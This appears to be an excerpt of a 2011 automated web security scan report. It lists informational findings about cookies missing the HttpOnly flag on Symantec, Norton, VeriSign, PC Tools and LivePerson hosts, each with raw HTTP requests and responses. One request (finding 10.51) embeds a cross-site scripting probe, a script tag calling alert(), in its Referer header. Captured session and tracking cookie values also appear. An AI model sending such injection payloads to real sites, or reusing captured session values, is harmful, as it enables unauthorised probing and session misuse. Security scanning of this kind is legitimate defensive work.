HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:22 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:28:22 GMT Last-Modified: Wed, 07 Sep 2011 21:28:22 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cacheSet-Cookie: evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T; expires=Sat, 10-Mar-2012 21:28:22 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
10.51. http://free.pctools.com/res/js/utils.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://free.pctools.com
Path:
/res/js/utils.php
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /res/js/utils.php HTTP/1.1 Host: free.pctools.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/ Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.3.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Fri, 09 Sep 2011 22:05:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 22:05:27 GMT Connection: close Vary: Accept-EncodingSet-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com
10.52. http://mbox3.offermatica.com/m2/verisign/mbox/standard
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM"Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign Content-Type: text/javascript Content-Length: 154 Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
10.53. https://onlinefamily.norton.com/familysafety/basicpremium.fs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://onlinefamily.norton.com
Path:
/familysafety/basicpremium.fs
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:formVersion=1315604730862; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /familysafety/basicpremium.fs HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:30 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/Set-Cookie: formVersion=1315604730862; Path=/ Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 41316 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Web Moni...[SNIP]...
10.54. http://renewals.symantec.com/renewals/application
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://renewals.symantec.com
Path:
/renewals/application
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:entryURL=/renewals/application The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /renewals/application HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:21 GMT Content-Type: text/html; charset=utf-8Set-Cookie: entryURL=/renewals/application Connection: close Content-Length: 21430 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]...
10.55. https://renewals.symantec.com/renewals/application
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/application
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:50 GMT Content-Type: text/html; charset=utf-8Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store Content-Length: 21436 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]...
10.56. http://sales.liveperson.net/hc/2735064/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net HumanClickKEY=3716944001314187740; path=/hc/2735064 HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NETSet-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064 Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998 lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton...[SNIP]...
10.57. http://sales.liveperson.net/hc/2735064/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HumanClickACTIVE=1315603889280; expires=Sat, 10-Sep-2011 21:31:29 GMT; path=/ HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:29 GMT; path=/hc/2735064; domain=.liveperson.net The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/2735064/?&site=2735064&cmd=mTagKnockPage&lpCallId=570873120101-204310992732&protV=20&lpjson=1&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=-5110247826455-1315603884:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NETSet-Cookie: HumanClickACTIVE=1315603889280; expires=Sat, 10-Sep-2011 21:31:29 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:31:29 GMTSet-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:29 GMT; path=/hc/2735064; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 29679 lpConnLib.Process({"ResultSet": {"lpCallId":"570873120101-204310992732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n...[SNIP]...
10.58. http://sales.liveperson.net/hc/2735064/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HumanClickKEY=3716944001314187740; path=/hc/2735064 HumanClickACTIVE=1315603882871; expires=Sat, 10-Sep-2011 21:31:22 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/2735064/?&site=2735064&cmd=mTagKnockPage&lpCallId=65178923542-457588254008&protV=20&lpjson=1&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:22 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NETSet-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064 Set-Cookie: HumanClickACTIVE=1315603882871; expires=Sat, 10-Sep-2011 21:31:22 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:31:22 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 29678 lpConnLib.Process({"ResultSet": {"lpCallId":"65178923542-457588254008","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne...[SNIP]...
10.59. http://sales.liveperson.net/hc/71097838/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net HumanClickKEY=298575764909514573; path=/hc/71097838 HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=942795420530-312355306232&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/resources/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=7891132346&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&PV%21unit=store-business&PV%21Section=Shopping%20Resources&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&SV%21ActivityCode=87117&SV%21store-business_ActivityCode=87117&SV%21RequestACallURL=http%3A//www4.symantec.com/Vrt/wl%3Ftu_id%3DeeiX12537391&SV%21store-business_RequestACallURL=http%3A//www4.symantec.com/Vrt/wl%3Ftu_id%3DeeiX12537391&title=Store%20Shopping%20Resources%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20s_pers%3D%2520s_nr%253D1315621903651-New%257C1336357903651%253B%2520event69%253Devent69%257C1336357903652%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/8 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; HumanClickKEY=298575764909514573; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603875047
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:16 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NETSet-Cookie: LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net Set-Cookie: HumanClickKEY=298575764909514573; path=/hc/71097838 Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:31:16 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998 lpConnLib.Process({"ResultSet": {"lpCallId":"942795420530-312355306232","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton...[SNIP]...
10.60. http://sales.liveperson.net/hc/71097838/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HumanClickKEY=7999207371985552108; path=/hc/71097838 HumanClickACTIVE=1315603614239; expires=Sat, 10-Sep-2011 21:26:54 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=170505760237-674877319251&protV=20&lpjson=1&id=7041138736&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/theme.jsp?themeid=contact-verisign User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315578244934
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NETSet-Cookie: HumanClickKEY=7999207371985552108; path=/hc/71097838 Set-Cookie: HumanClickACTIVE=1315603614239; expires=Sat, 10-Sep-2011 21:26:54 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:26:54 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 33062 lpConnLib.Process({"ResultSet": {"lpCallId":"170505760237-674877319251","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n...[SNIP]...
10.61. http://sales.liveperson.net/hc/71097838/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/ HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/products/downloads/index.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NETSet-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:26:59 GMTSet-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 33062 lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n...[SNIP]...
10.62. https://ssl-certificate-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: ApacheSet-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.63. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:42 GMT Server: ApacheSet-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
10.64. https://ssl-certificate-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
